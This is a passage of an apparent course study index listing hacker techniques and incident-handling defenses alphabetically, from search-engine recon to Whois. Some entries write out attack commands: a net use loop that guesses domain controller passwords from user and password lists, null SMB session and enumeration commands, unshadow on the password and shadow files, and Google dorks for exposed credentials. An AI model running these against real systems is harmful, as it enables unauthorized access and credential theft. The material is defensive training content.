Search Engine Recon: --Remove individual pages ("NOINDEX, NOFOLLOW meta tag)
2 44 --Remove snippets ("NOSNIPPET" meta tag)
Defense
--Remove cached pages ("NOARCHIVE" meta tag)
--Remove an image from Google Image Search
Remove unwanted items from Google
--File out request form
--Make specific change to page
 Keywords Book Page Remarks

Search for specific file types on a target domain

Look for active content: .asp, .jsp, .php, or .cgi
Excel spreadsheets: Search for .xls and view it as HTML…
Search Engine Recon: - Spreadsheet image comes from Google cache
2 40
File Types .ppt can also be useful
For example, search for
- site:www.[target].com asp
"filetype:" is useful, but also try just the suffix
"filetype:" is the same as "ext:"

Search on "cache:www.google.com"
Brings up the cached version of the page
Search Engine Recon:
Google's Cache and 2 39 Browse the Google cache
Wayback
The Wayback Machine is a thorough view, with multiple images over time

"site:"
--searches only within the given domain
--site:www.google.com
"link:"
--shows all sites linked to a given site
Search Engine Recon: --link:www.google.com
2 37 "intitle:"
Search Directives
--shows pages whose title matches the search criteria
"inurl:"
--shows pages whose URL matches the search criteria
"related:"
--shows similar pages (sometimes useful, sometimes not)
"info:"
--finds cached page, related pages, pages that link to it, pages that contain the termin (NOT USEFUL)

Surround literals with " ", as in "Soc Sec Num"

Add minus (-) to a search term to maximize effectiveness of resulting hits
--Excludes pages with a given word
Search Engine Recon:
2 38 ----For example, search on: site:sans.org
Search Tips and Types
Search for airline status
--Type in airline and flight number
--Front end to Travelocity search for VIN for vehicle information
Search for UPC number for product info
 Keywords Book Page Remarks
We can perform various searches associated with commonly exploited systems
- Available remote desktop systems: ext:rdp rdp
- Default web material ( Apache, IIS, ColdFusion, and others)
- Web-based FileMarker Pro databases: "Select a database view"
Search Engine Recon: - Indexable directories: intitle:index.of"parent directory"
2 42
Vulnerable Systems - User IDs and passwords ( look for "password" and "userid")
- Shell history ( look for common shell names and commands)
- Video cameras (example: search for inurl:"ViewerFrame?Mode=")
FOCA has the ability to identify many of these vulnerabilities
FOCA has the ability to identify many of these vulnerabilities

Session hijacking synthesizes sniffing and spoofing

Session Hijacking 3 67 Option 1: Steal session at origination or destination (ttysnoop, ttyspy)
Option 2: Steal sessions across network (ettercap)
Containment
Session Hijacking - -Drop suspicious sessions
Defenses: Containment, 3 77 -Carefully analyze destination systems when session was hijacked
Erad, and Rec Erad, Rec
---At a minimum change passwords, rebuild systems

-Users dropping sessions

-Incorrect ARP entries
To check form local machine
- On Windows, type c:\> arp -a
Session Hijacking - - On UNIX type $ arp -a or arp -e depending on your UNIX flavor
3 76 To check across the network (ARPWatch)
Defenses: Identification
To look at DNS cache on Windows client, type c:\> ipconfig /displaydns
-Error messages from SSH clients

-Drop suspicious sessions

-Carefully analyze destination systems when session was hijacked
---change passwords, rebuild systems

When a user initiates a session with a web server for an online application, many applications request a userID and
password to authenticate the user. URL
Session Tracking 4 136 tracking, hidden form elements, cookies
--used to track sessions, HTTP is stateless
Session tracking tools: Tamper Data, Firebug, Add-n-Edit cookies

Set-Net-Adapter 2 72 Windows Powershell commandlet used to change MAC address

- It could be a factor in a sexual-harassment case
Sexually Explicit - It could embarrass your organization
Websites (Unauthorized 1 169 - These sites sometimes distribute spyware and other forms of malicious code
Use) **keep a close eye on company FTP servers, etc.
sha1sum 2 13 built in Linux integrity tool
ShellShock 4 91 See first paragraph
Shodan 2 51 Provides details about a target via banner-grabbing.
-Can ID services/products run on a target machine
SilentEye 5 144 Embeds encrypted data and other files into JPEG, BMP, and WAVE formats
 Keywords Book Page Remarks
SL4NT 5 121 reference
S-Mail 5 143 Hides data in exe and dll files
If the data size is not check RP can be overwritten by user data
Smashing the stack 3 103 Attacker exploit places machine code in the buffer and overwrites the RP
When function returns, attacker's code is executed

enum -S [TargetIPaddr] pulls a list of shares (IPC$, ADMIN$, and CS$)

enum -U pulls list of users
SMB Enumeration 2 136 enum -G pulls groups and membership
enum -P pulls password policy information
Enum uses a NULL SMB session
Use -u [User Name] -p [Password] for authenticated session in Enum
SMB is a Layer 7 protocol that implements file and printer sharing,
SMB Protocol 2 134 -also includes domain auth and remote admin
-Used by File Explorer, net use, sc, reg, psexec
Accessed via TCP port 445 or NetBIOS ports 135-13 (Win NT, Win2k)
C:\> net use see SMB sessions
SMB Session - Drop 2 143 C:\> net use \\[IP Addr] /del drop sessions
C:\> net session see who has an inbound session
C:\> net session \\[IPaddr] /del drop an inbound session

Windows use net use command to establish the session

--net use \\[Target IP]
Typically the admin share is selected (indicated by a $)
SMB Session - Windows 2 135 To connect as another user or to a specific share:
--net use \\[Tareget IP]\[Share Name] [password] /u: [username]
To connect as no user (an anonymous or NULL SMB Session):
--net use \\[Target IP] "" /u:""
C:\> net view Show shares and systems
SMB Sessions - First C:\> net user /domain Users
2 137 C:\> @FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$
Three Commands
/user:DOMAIN\%n %p 1>NUL 2>&1 &&echo [*] %n %p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL
(crack passwords)

Verify in registry that you're blocking NULL SMB sessions (pg 151)
Block/limit vulnerable ports:
SMB Sessions (Evil) TCP/UDP 445 MS Server Message Block
2 144,145 TCP 135 RPC/DCE Endpoint mapper
Defenses
UDP 137 NetBIOS Name Service
UDP 138 NetBIOS Datagram Service
TCP 139 NetBIOS Session Service
Use the smbclient tool:
SMB Sessions from $ smbclient -L [WinIPaddr] -U [username] -p 445
Linux to Windows via 2 141 (enter password when prompted) To list available shares
SMB Client $ smbclient //[WinIPaddr]/test -u [username] -p 445
(enter password when prompted) pull files from SMB share
 Keywords Book Page Remarks

Used to establish an SMB session from Linux to Windows

To list available shares:
smbclient -L [WinIPaddr] -U [username] -p 445
Enter the password when prompted
smbclient 2 141 To connect to an SMB share and pull files interactively (behaving like an FTP client)
smbclient //[WinIPaddr]/test -U [username] -p 445
--Enter the password when prompted
--You get an "smb:\>" prompt
--Use ls for directory listing, cd to change directories, and get to get files
--Type ? for a list of additional commands

smbmount 4 52 Command reads the hashes from the environment variable named SMBHASH, overriding any passwords provided by the
attacker, using the hash for authentication to the target instead
Snar Agent and Log
5 121
Server reference

Once data is flowing through our proxy we can start harvesting various sensative data
Snarfing Application Data 3 54 - User IDs, Passwords, Session Identifiers, URLs, etc.
We can invoke keystroke loggers within browsers
- MitMf has a module called Jskeylogger which allows us to grab keystrokes by injecting code into viewed webpages
MitMf also has a tool called ScreenShotter which invokes HTML5 Canvas to take a screenshot of the browser

Sniffers gather all information transmitted across a line

- For broadcast media (such as Ethernet or wireless network), sniffers allow an attacker to gather passwords and more
Sniffers 3 45 - For Ethernet, all data is broadcast on the LAN segment
- Switched Ethernet limits data to a specific destination physical port on a switch
- Switches perform switching by determining which MAC addresses are connected to which physical interface (by
observing the source MAC address of Ethernet frames), storing this information in the memory (called a CAM table)
-NOTE: To sniff in a switched envirnoment, the attacker needs to redirect the flow of traffic on the LAN, either by
attacking the switch itself or going after the machine sending the traffic
-Hard-code ARP tables on sensitive LANs
Sniffing and Session -Activate port-level security on you switches, sticky ports
3 76 -Use Dynamic APR Inspect with DHCP Snooping
Hijacking Defenses
-encrypt sessions and use strong authentication
-Dont Telnet to infrastructure components
Sniffing and Session
Hijacking Defenses: 3 77
Containment
 Keywords Book Page Remarks

Step 1: Attacker runs the DNS Spoofing program and a web of SSH proxy
Step 2: Victim tries to resolve a name using DNS
Step 3: The victims browser establishes an SSL connection (with the web proxy process on the attackers machine)
Sniffing SSL and SSH 3 60 Step 4:The web proxy establishes its own SSL connection with the real destination web server
Step 5: The victim sees a message saying that the wen server's cert isn't signed by a recognized Cert Aut(CA). But, most
users simply continue the session! As the user accesses the website all traffic appears on the attackers machine
The same process applies for SSH
Essentially, web proxy and ssh proxy tools used to exploit a trust model based on the user knowing what is okay and what
is not
sniffit 3 72 allows attack to look at data, ettercap is better!

Check hashes across multiple mirrors

--Check multiple hash algorithms (SHA1, SHA256, MD5, etc.)
Software Distro Site: --Md5sum and sha1sum are built into Linux
2 13 --Md5summer is available for free for Windows
Defense
--RIPEMD-160
Check PGP signatures if available
Don’t put new software directly into production; test first
Solaris-Gratuitous ARP 3 49 Solaris avoids this problem by implementing a specific lifetime for ARP cache entries. Of course, on Solaris, you just have
to wait for the ARP cache entry to time out, and then hit it with the poison entry
Sorting through a Bunch The grep command finds items that match a given condition
1 244
of Data (grep)
IP spoofing. Source routing is an option in IP that allows the
Source Routing 3
source a packet to specify the path it will take on the network
Use split-split DNS
Split DNS 3 94 one server resolves names for internal net, one for externally accessed sites
Best solution, but complex/expensive
Preparation
1) make Initial Sequence Numbers unpredictable-
--install patches for TCP/IP stacks as vendors release updates.
2)don't extend trust outside of firewall.
Spoofing IP - Defense 3 3) Don’t base authentication on IP- utilize passwords, crypto,
4) Replace -r commands with stronger commands- such as SSH.
5) Utilize anti-spoof filters at routers and firewalls
6) Don’t allow source routed packets through network gateways

sptoolkit 1 20 sptoolkit is an excellent way to create phishing campaigns and track the results

This technique tries to manipulate a backend database by going through the web apllication and trying to add information to
SQL Injection 4 96 a SQL statement. SQL is the Structured Query Language, a tool used to access most relational databases today.
**select [field] from [table] where [variable] = '[value]';
**update [table] set <variable> = '<value>';
 Keywords Book Page Remarks
Most web apps use a SQL database
--if input is not scrubbed, user can append SQL syntax to queries
--error messages can be used to ID poor input validation

-Limit the permissions of the web app when accessing the database
SQL Injection 4 94 - 101 -Consider using parameterized stored procedures:
-On the server side, the app should filter user input

tools: Nmap, Zed Attack Proxy (ZAP), Burp, Sqlmap, Havij

ModSecurity offers solid filtering features for Apache, IIS, and Nginx

SQL Injection
4 99 - 102
(Examples) Finding errors, Dropping Data, Grabbing more Data, Getting Database Structure
SQL Injection: attackers first try to find some user-supplied input string in the web application. Attackers then start adding string quotation
4 97
Vulnerabilities characters to the user data to see how the system reacts when the data is submitted

After target user input string has been identified, use standard database logic elements and see what happens!
--Double dash (--): Comment delimiter
SQL Injection: Data
4 98 --Semicolon (;): Query terminator
Manipulation
--Asterisk (*): Wildcard selector
--Percent (%): Matches any substring
--Underscore(_): Matches any character
Other useful entities are OR, TRUE, 1=1, SELECT, JOIN, and UPDATE

Preparation:
--Limit the permissions of the web app when accessing the database
----Wont eliminate SQL Injection but can limit damage
--Consider using parameterized stored procedures:
----Code splits up user input into parameters fed to stored proc in database
--On the server side, the app should filter user input, removing:
----Quotes of all kinds (i.e, )
----Minus signs (-) Semicolons(;) Asterisks (*) Percentages (%) Underscores (_)
SQL Injection: Defenses 4 103, 104 ----Other shell/scripting metacharacters (=&\|*?~<>()[]{}$\n\r)
--ModSecurity offers solid filtering features for Apache, IIS, and Nginx
--PHP PDO
Identification:
--Search web application logs for special characters or phrases such as union, select, join and inner
--DLP tools may detect exfiltration event for PII
*Although encryption may hamper the ability to detect
Containment:
--Block source IP address and/or account being exploited
Eradication:
--Remove attacker data from the system
--Launch fraud investigation if required
SSH Sniffing 3 63 SSHmitm (SSH protocol version 1 only)
SSHmitm substitutes its public key for the SSH server's, setting up two SSH connections
sshmitm 3 63 Sniff SSH- DNSSpoof
SSID cloaking 2 60 APs configured not to include the SSID in beacons
 Keywords Book Page Remarks
SSL sniff 3 57 DNSSpoof webmitm
SSL Warning 3 61, 62 See screenshots
Vulnerability in some versions of Apache, which dumps system memory via malformed heartbeat requests
SSL Warnings Dodging 3 65, 66, 67
PowerBleed by Joff Thyer does this. See Methods for Dodging SSL Warnings

sslstrip / sslstrip+ 3 68 rewrites all https URLs into HTTP URLs. To stop this many organizations have implemented HTTP Strict Transport Security
(HSTS). Implemented in MitMf
The stack is LIFO (last in first out) You push things on top of the stack and pop things from the top of the stack
Stack 3 102
The return pointer (RP) contains the address of the calling function

See screenshot
Starting Rekall 5 24 $source /home/tools/rekall/bin/activate
(rekall)$ rekal -f /home/tools/504_memory_ex/memimage.dd
Stash 5 143 Hides data in a variety of image formats
Can hide data in a variety of formats
Stego 5 142 -Images (BMP, GIF, JPEG)
Word documents, Text documents, Machine-generated images
Fractals, complex crowds of animals/flowers/people

Jsteg- Hides in jpeg images using the DCT coefficients

MP3Stego- hides in mpeg files
Stego Tools 5 143 S-Mail- Hides data in exe and dll files
Invisible Secrets- Hides data in banner ads that appear on websites
Stash- Hides data in a variety of image formats
Hydan- Hides data in UNIX/Linux and Windows executables
OpenStego- Embeds data and digital watermarks into images
Stego Tools (More) 5 144 SilentEye-Embeds encrypted data and other files into JPEG, BMP and WAVE formats
OpenPuff-Great support for images, audio, video and flash-adobe files

Preparation:
--Get familiar with stego tools
--Look at changes to critical web server files (file integrity-checking tools)
Identification:
--If you have the original source image, detection is easy
Stego: Defenses 5 150, 151 ----*Preform a diff or file comparison and see whether they are different
----*MD5 or SHA-1 hashes can help
----Stego might not change the size or make any observable changes, but it does change the data
--If you are working on a HR or legal case, take directions from your legal team
Containment:
--Work with law enforcement and HR
Erad, Recov:
Work with your company's legal team

StegExpose: Jave utility to detect stego in lossless images where Least Significant Bit (LSB) techniques
--This stego is where the LSBs which determine color are modified
Stego: Detection 5 149 --This leads to a very slight (think imperceptible) change of color made to the original image
Supports a number of different "detectors" or mathematical analysis techniques to detect stego
For quick analysis, it can also use "cheap" or quick analysis methods to detect the presense of stego
Has the ability to run on a large number of files very quickly
 Keywords Book Page Remarks
StegoExpose: Java utility to detect stego in lossless images where Least Significant Bit (LSB) techniques
StegoExpose 5 149 Supports variety of mathematical analysis techniques for detection
--can also use "cheap" methods to detect the presence of stego quickly
Subroutines 3 101 SEE SLIDE - Buffer Overflows
Outstanding MITM tool, similar to Dniff suite, in an easy web interface
Subterfuge 3 64 --advanced credential harvester that supports SSL Strip
--module for hijacking sessions and HTTP manipulation, like Ettercap
--module that supports blocking VPN tunnels

SYN scans 2 94 Only send the initial SYN and await the SYN-ACK response to determine if a port is open. The final ACK packet from te
attacker is never sent. The result is an increase in performance and a much stealthier scan. Because most host systems do
not long a connection unless it completes the three-way handshake, the scan is less likely to be detected.
SYS_execve 5 59 used by the kernel/OS to execute programs
SYSKEY 4 31 Extra layer of encryption for the SAM Database
System Center Config SCCM is a one-stop shop for a wealth of IR data.
Manager (SCCM) 1 138 --reports on installed software, drivers, users, services
(Enterprise-Wide IR)

System-Level Detection 1 57
View Diagram
Tamper Data 4 137 Free Firefox plug-in for manipulating numerous aspects of HTTP Requests
Taranis 3 48 Taranis can bombard a switch with a flood, just like Macof. Taranis sends Ethernet frames with victim's MAC address to
trick the switch into thinking the victim's MAC address is on two ports
TCP and UDP ports 2 90 Port scanners send packets to various ports to determine whats listening
TCP Header 2 92 view slide
TCP Ports 2 90 65,536 ports. TCP port 80 (web server), TCP port 445 (Windows Server Message Block), TCP 6000 indicates a X Window
Server
TCP sequence prediction 2 94
Useful in spoofing attacks, as we shall see in short while

Initial SYN establishes sequence number for A to B. Usually, B must remember this, allocating state in its connection
queue. Response SYN-ACK establishes sequence number for B to A

TCP Three-way SYN: Synchronize

2 91
Handshake ACK: Acknowledgment
FIN: End of connection
RESET: Tear down a connection
URG: Urgent data is included
PUSH: Data should be pushed through the TCP stack
tcpkill
- Kills existing TCP connections
tcpkill 3 50 - Sends spoofed RESETs to both sides
- Forces user or application to reauthenticate
- Attacker can the grab or participate in session authentication
tcpnice
tcpnice 3 50 - Active traffic shaping: Inject packets with smaller TCP window sizes or ICMP source quench
- Useful if sniffing a fast connection and you need to slow down the rate of packet flow for a given connection
TCPview 2 102 For a GUI view of port usage use TCPview
 Keywords Book Page Remarks
Terminator 3 128 Type of Canary
Traceroute sends packets with small TTL(Time to Live) values
Traceroute 2 84 IPv4 TTL and IPv6 Hop Limit is the number of hops the packet should go before being discarded
Based on the source address of the TTL-exceeded message, you can determine the router for a given hop
The scanning system increments TTL for each packet to determine each router hop
Trade Secrets 1 180 Protect sensitive info required for your business for which you have taken reasonable precautions to secure
Trademarks, Service
1 180
Marks Protect brands, whether icons, phrases, or sounds
Tripwire 5 73 File Integrity Checker
Looks for registry modifications
Trojan 5 6 A Trojan Horses hides malicious activity in legit software

You can carry any protocol on top of any other protocol

First protocol s encapsulated inside packets for second protocol
--Network sees only second protocol
Tunneling and Covert
5 115 Example:
Channels
--X Windows over SSH
--IP inside IP
--IP over CP (the Avian Transport Protocol)
----RFCs 1149 and 2549
Numerous tools carry data inside the payloads of ICMP packets
Tunnels - ICMP 5 119 -ptunnel (TCP over ICMP Echo and Reply), Loki (Linux Shell), ICMP Shell (Linux), PingChat (Windows chat program),
ICMPCmd (Windows cmd.exe access)
UDP Header 2 93 view slide
UDP Ports 2 90 65,536 ports. UDP port 53 (DNS server). Each open port offers a potential way into a system.
Helps locate vulnerable UDP services. For most UDP ports, Nmap sends packets with an empty payload. But, for a dozen
UDP scanning 2 94 specific ports, NMAP includes an application appropriate payload for the given port, including UDP port 53 (DNS), 111
(portmapper), 161 (SNMP), etc.
UID 0 root level.
authorized access, but used inappropriately
Unauthorized Use 1 164 - E-Mail problems
- Inappropriate web surfing (sexually explicit, e.g.)

Guard the password file!

--Carefully protect backups
UNIX Password --Physically protect system build media
Cracking: Defenses 4 40 Enforce strong passwords:
(John the Ripper) --(PAM)
Use shadow passwords
Use Crypto-based and token-based authentication
UNIX Password File /etc/passwd has one line per account with colon-separated fields: The fields are Login name: Encrypted password: UID
4 36
Format Number: Default GID: GECOS Info: Home Directory: Login shell:

UNIX Shadow File

4 37 /etc/shadow is readable only with superuser privileges (UID 0). The following fields are Login name: encrypted password:
Format
Date_of_last_pw_change: Min_pw_age_in_days: Max_pw_age_in_days: Advance_days_to_warn_user_of_pw_age
 Keywords Book Page Remarks

to counter packers, use unpackers or debugger plugins

Unpacking Windows Immunity Debugger - Very popular free Windows debugger
5 20
Executables: Defenses --Ollydbg (windows) has dozen of unpacking scripts
www.openrce.org

unshadow 4 35 command used to run John on a machine with shadowed passwords.

# unshadow /etc/passwd /etc/shadow > combined
Unusual Accounts
1 71
(Windows Cheat Sheet)
Look for new, unexpected accounts in Admin group (C:\> lusrmgr.msc

Unusual Files (Windows

1 72 Check file space usage for sudden major decreases in space. Use GUI or type C: \>dir c:
Cheat Sheet)
Look for files larger than 10 MB C: \> FOR /R C: \ %i in (*) do @if %~zi gtr 10000000 echo %i %~zi

Unusual Log Entries

1 74 Look for indications that the event log services was stopped. Look for a sign that Windows file integrity checker was
(Windows Cheat Sheet)
disabled or a sign that Microsoft Telnet service has been invoked

Unusual Network Usage

1 66
(Windows Cheat Sheet)
netstat -na, netstat -na 5, netstat -nao 5,

Unusual Processes
1 67
(Windows Cheat Sheet)
tasklist, wmic process list full, wmic process get name
At the command line can also be used to query the values of these settings
Unusual Reg Key Entries C:\> reg query hklm\software\microsoft\windows\currentversion\run
1 69
(Windows Cheat Sheet)

Unusual Scheduled
Tasks (Windows Cheat 1 73
Sheet) Look at scheduled tasks on the local host by running C:\> schtasks

Unusual Services
1 68
(Windows Cheat Sheet)
Several commands can be used to check for unusual services, such as services.msc, net start, tasklist /svc, sc query | more
Nikto. converts Http request into different representation, by changing ASCII characters into their hexadecimal values and
URL Encoding 2 prepending them with a % character.
'- Get /%63%67%69%2d……./broken.cgi HTTP/1.0
URLsnarf 2 68 Captures all URLs from HTTP traffic
Pluggable Authentication Modules (PAM)
Use PAM to Enforce Can link UNIX login to various systems:
4 41
Password Complexity -RADIUS, Kerberos, and more
Can enforce password complexity
 Keywords Book Page Remarks

$ rcpclient -U [username] [WinIPaddr] establish a session

You have an rpcclient prompt with many commands available
- enumdomusers: List users
Using Samba RPC Client - enumalsgroups [domain]|[builtin]" List groups (stands for "enum alias groups")
2 142 - lsaenumsid: Show all users SIDs defined on the box
from Linux For Mor e Info
- lookupnames: [name]: Show SID associaled with user-or group name
- lookupsids [sid]: Show user name associated with SID
- srvinfo: Show OS type and version
The rpcclient man page lists hundreds of other commands
- Those listed here are the most useful and a lab covers them shortly
utmp file - Accounting utmp: File contains info about currently logged in users
5 84
Entries in UNIX -Default location on Linux: /var/run/utmp
Uwhois 2 20 Another useful source of whois that supports domain name registration lookups for more than 246 countries.
safely put the impacted systems back into production
Validation (Recovery) 1 122 - verify proper operation and continue to monitor
-review baseline docs and conduct systems tests by procedure

Version scanning 2 94 Tries to determine the version number of the program listening on program listening on a discovered port for both TCP and
UDP

VNC is free, popular, and quite feature rich.It uses TCP port 5900 to send a GUI across the network
VNCs default security is problematic. It does include a password, but has been sucbject to monkey-in-the-middle and buffer
overflow attacks in the past.
Virtual Network Flexible cross-platform remote access suite
Computing (VNC) 5 10 --Can be used for legit remote admin
Overview ----If you use VNC for admin, we recommend you carry that access across a secure, encrypted session, such as SSH or
Encrypted VPN
GUI across the network
--Included in the Metasploit payload arsenal
Most anti-virus tools do not detect it, because of its legit uses
Virus 4 56 A defining characteristic of a virus is that it infects a host file, such as a document, e-mail, or executable.
Malware detects VM and may run differently if present
VM Detection 4 77 --Helps confuse malware reverse engineering
--It's also useful for attackers to find honeypots
--may lead to virtual machine escape

Look for VME artifacts in processes

Look for VME artifacts in memory
VM Detection - Process 4 78 Look for VME-specific virtual hardware
Look for VME-specific processor instructions and capabilities

VMs have specific hardware, registry, networking entries that we ID

Vmcat
VM Escape 4 79 escape allow an attacker to execute code on the host
--can control the hypervisor, seize shared resources for all VMs
VM Escape: Defenses 4 80 Maintain patches, separate systems by sensitivity
--be careful about which systems share resources
 Keywords Book Page Remarks
Vmcat 4 79 Vmcat implements netcat like functionality without using the network. Instead, it directs standard in and standard out
between a process on the guest machine and a process on the host.
-.vmx = Virtual machine's configuration
-nvram = Stores the state of the virtual machines BIOS
Vmware Machines 1 196 - .vmdk = Stores the virtual disk file, the hard drive image(s) of the virtual machine
- .vmss = Suspended state file, for a paused virtual machine
- .vmsn = Snapshot file, used for taking a snapshot of the system state for restoring it later

Flexible, cross-platform remote access suite

10 - Can be used for legit remote admin
VNC Overview 5
- 13 **Only use in a secure, encrypted session (SSH or Encrypted VPN)
--Most anti-virus tools don't detect it, because of its legit uses

Huge platform support with interoperability

--Windows
--Linux
--Solaris
VNC Platforms 5 11
--HP-UX 11
--Mac OS X
Client or server on each of these platforms
Windows can control UNIX and vice versa
VNC is also a very useful Metasploit payload
The VNC client can run in two modes:
VNC: Active Client and --Active connection to server listening on a port (TCP 5900 by default)
5 12 --Listening mode, waiting for server to send a connection to the client - "Shoveling" GUI!!
Listening Client
----When configured to listen, client uses TCP 5500 by default
TCP 5800 just serves up a Java applet of a VNC viewer
covert channel backdoor with encoded C2 (base64)
VSAgent 5 132, 133 --inserts into __viewstate__ parameter
The encoded data is sent in the clear
Very difficult to detect
Perform vulnerability analysis
Vulnerability Analysis - Perform system/network vulnerability analysis
1 120 --Conduct a port scan
(Eradication)
vulnerability scanners: Nessus, OpenVAS, NeXpose, and Qualys

Vulnerability Scanners 2 115 Test against a list of know exploits

-Nessus, OpenVAS, NeXpose, SAINT, Retina, Foundscan, Qualsys

Preparation:
--Close all unused ports, Shut off all unneeded services
---- In windows, stop or delete services in Services control panel
Vulnerability Scanners - ---- In UNIX, edit /etc/inetd.conf or /etc/xinetd.d files, as well as rc.d files (chkconfing)
2 121
Defense --Apply all system patches, Run credential scans of your environment
Identification:
--Utilize intrusion detection system signatures (IDS)
--Most vulnerability scanners trip hundreds of signatures
Cont, Erad, Rec: N/A
 Keywords Book Page Remarks
Dial a sequence of telephone numbers, attempting to locate modem carriers or a secondary dial tone
War Dialers 2 53 Demon dialers: dial a single number to conduct a brute-force attack against passwords
Often an unprotected modem provides the easy method for accessing routing and switching components
War Dialing: Defenses 2 57 Defense: conduct self-scanning/remediation (pg 57-58)
War Driving 2 60 Scanning for open/misconfigured WAPs that can be exploited
-InSSIDer, NetStumbler,

Josh Wright has release a tool called CoWPAatty

A dictionary based cracking tool for pre-shared keys with WPA1 and WPA2
Must sniff four-way handshake
War Driving: CoWPAtty Cryptographically, WPA is a complex protocol
2 65
- On a modern laptop, crypto routines can try between 10 and 50 guess/encrypt/compares per second
Thus, pre-computed encrypted dictionaries are a big help...But, WPA folds SSID into its cryptographic exchange
Pre-computed dictionaries are available for
The 1000 most common SSIDs (Linksys, tsunami, for example, with 172,000 passwords for >7Gigs
The 1000 most common SSIDs with 1 million words for > 33 Gigs
Warhol/Flash Technique 4 62 Prescan large portions of the Internet, looking for 10,000 or so vulnerable systems: After compromising initial 10,000 hosts,
normal scanning ensues
Establish policy and warning banners--Warning banners limit the presumption of privacy

Access to the system is limited to company-authorized activity-

-Any attempt at or unauthorized access, use, or modification is prohibited--
Unauthorized users may face criminal or civil penalties--
The use of the system may be monitored and recorded--
Warning Banners 1 21 If the monitoring reveals possible evidence of criminal activity, the company can provide the records to law enforcement

Have a legal team review this banner, approving it in writing--Be careful of local privacy laws, especially in Europe.--
European Data Privacy Directives may impact that crucial line

Required if monitoring may lead to disciplinary action or prosecution

- That access to the system is limited to company-authorized activity
- That any attempted or unauthorized access, use, or modification is prohibited
- That unauthorized users may face criminal or civil penalties
Warning Banners
1 173 - The use of the system amy be monitored and recorded
(Insider Threat)
- If the monitoring reveals possible evidence or criminal activity, the company can provide the records to law enforcement
**Verify wording with legal staff, and be careful with European Data Privacy Directives
 Keywords Book Page Remarks

war dials from VoIP accounts, 1k+ per hour

-can spoof caller ID
Conducts war dialing using one or more VOIP Accounts
--No telephony hardware requred..just an Internet connection and VOIP account
----Provider must support IAX protocol
----Several compatible VOIP providers that do not prohibit war dialing are listed on the WarVOX website
WarVOX 2 54 --Traditional modem-based war-dialing: 1,000 numbers in approx. 8 hours
--WarVOX War dialing: 1,000 numbers per hour
A significant increase in speed
Supports caller ID spoofing
--Enter a single number for all calls dialed
--Enter a variable number of Xs for psuedo-random source number
--Enter SELF to make caller ID same as dialed number, may pybass PIN autentication in some voicemail systems
List of UserIDs for login guessing on pg56
Waste 4 Another method for bot communication involves using a distributed protocol called Waste. Originally created by AOL
Wayback 2 39 The Wayback Machine is a thorough view, with multiple images over time

Preparation:
--Carefully test every variable
--a single open variable can be manipulated and compromise the system
Implement a WAF
--SecureSphere Web App Firewall
--Citrix NetScaler App Firewall
--F5 Application Security Manager(ASM)
Web App - Proxy: --Free OWASP Stinger
4 143, 144 --Free ModSecurity offers similar protections; although it is not a proxy
Defense
Identification:
--Users complaining of account usurpation,
Containment:
--Strongly advise shutting down app while it gets fixed. Otherwise, quarantine accounts that have fallen victim,
Eradication:
--Remove attacker's data from victim accounts,
Recovery:
--Carefully restore accounts and reset passwords for victim users. Monitor these accounts carefully

Web App Attack Proxies

4 139
(Numerous Tools)
ZAP Proxy, Burp Proxy, w3af, and Fiddler
SecureSphere Web App Firewall
Citrix NetScaler App Firewall
Web App Firewall (WAF) 4 143 F5 Application Security Manager(ASM)
Free OWASP Stinger
Free ModSecurity offers similar protections; although it is not a proxy
 Keywords Book Page Remarks

Web App Manipulation The proxy enables the attacker to edit the raw HTTP or HTTPS, including nonpersistant cookies
4 138
Proxy Architecture -You can view and edit anything that's passed to the browser such as Account Numbers, Balances,shopping cart price
ZAP Proxy, Burp Proxy, w3af, and Fiddler
Web App Proxy 4 138 The proxy enables the attacker to edit the raw HTTP or HTTPS, including nonpersistant cookies
ZAP Proxy, Burp Proxy, w3af, and Fiddler
Web Application Attack
and Audit Framework 4 139
(W3AF) includes numerous features, implemented in Python, including a Man-in-the-Middle proxy for manipulating web applications.

Web Application ID: Users complaining of account usurpation, Containment: Strongly advise shutting down app while it gets fixed.
4 144 Otherwise, quarantine accounts that have fallen victim, Eradication: Remove attacker's data from victim accounts,
Defenses
Recovery: Carefully restore accounts and reset passwords for victim users. Monitor these accounts carefully

Web Application Proxy: Carefully test every variable

4 142 --a single open variable can be manipulated and compromise the system
Defenses
-implement a Web Application Firewall
Web Based Recon: Shodan, DNSStuff, tracert, traceroute, network-tools, securityspace
2 50
Attack Tools - all are able to research target sites, provide info about network/vulns
You can view and edit anything that is passed to the browser
Any variable passed to the browser can be altered by user unless the application performs from integrity checks
Web Inputs 4 141, 142 Sometimes, 99.99% of all state information is an application is covered
But on one screen, a single variable is passed in the clear without a hash or timestamp
With just one piece of unprotected state, the application is vulnerable
block access to such sites with proxies:
Web Proxies -WebSense
1 170 -Blue Coat
(Unauthorized Use)
- By stopping 90% of the problem, it allows handlers to focus on the remaining 10% and other sensitive issues
Web proxies may not have the most current blacklists
Web Proxy Data -review for odd URLs and compare to other indicators
1 134 Review users agent strings
(Enterprise-Wide IR)
- Many malware specimens use older or odd user agent strings

-automated program that scans sites looking for known, vulnerable material
Web Scanners 2 looks for specific scripts' names that are known to have problems.
-Are very basic
-sometimes called Web/cgi scanners.
WebGoat 4 82 WebGoat: A buggy web app, ready for you to test
webmitm 3 57 Sniff SSL - DNSSpoof
 Keywords Book Page Remarks

Preparation:
--Limit and control information
--Know what information a company is giving away and perform risk analysis
--Make employment ads more general, if HR lets you
Website Searches: --Limit information on a website
2 33
Defenses --Determine what other sites are linked to your company
Identification:
--Look for web spider/crawler activity
----Logs show systematic access of entire website, page by page
--Somone just sucked down the entire contents of our site
Cont, Erad, Recov: N/A
WebSpy 3 53 Sends sniffed URLs from Dsniff to the attackers browser. The attackers browser then shows the pages that the target is
surfing in real time
WEPCrack 2 64 Crack WEP keys

Whois database contain a treasure trove of information

--Many can be accessed via the web
--Alternatively, use the "whois" command built into many UNIX implementations
--Used to gather contact names, DNS information, and othe data
Whois 2 19
First, look up the target at InterNIC to determine the registar
--www.internic.net/whois.html
--Operated by Internet Corporation for Assigned Names and Numbers (ICANN)
Then, go to registrar's whois database to get detailed records
--For example, http://www.networksolutions.com/whois/index.jsp

Preparation:
--Just live with it
--Use organization name or title with real email and phone number
Whois: Defenses 2 22 --Keep records up to data
--Be wary of anonymous registration agents
Identification:
--You cant tell if someone has looked you up
Cont, Erad, Recov: N/A

Attackers look for IP Address assignments in these geographic whois databases:

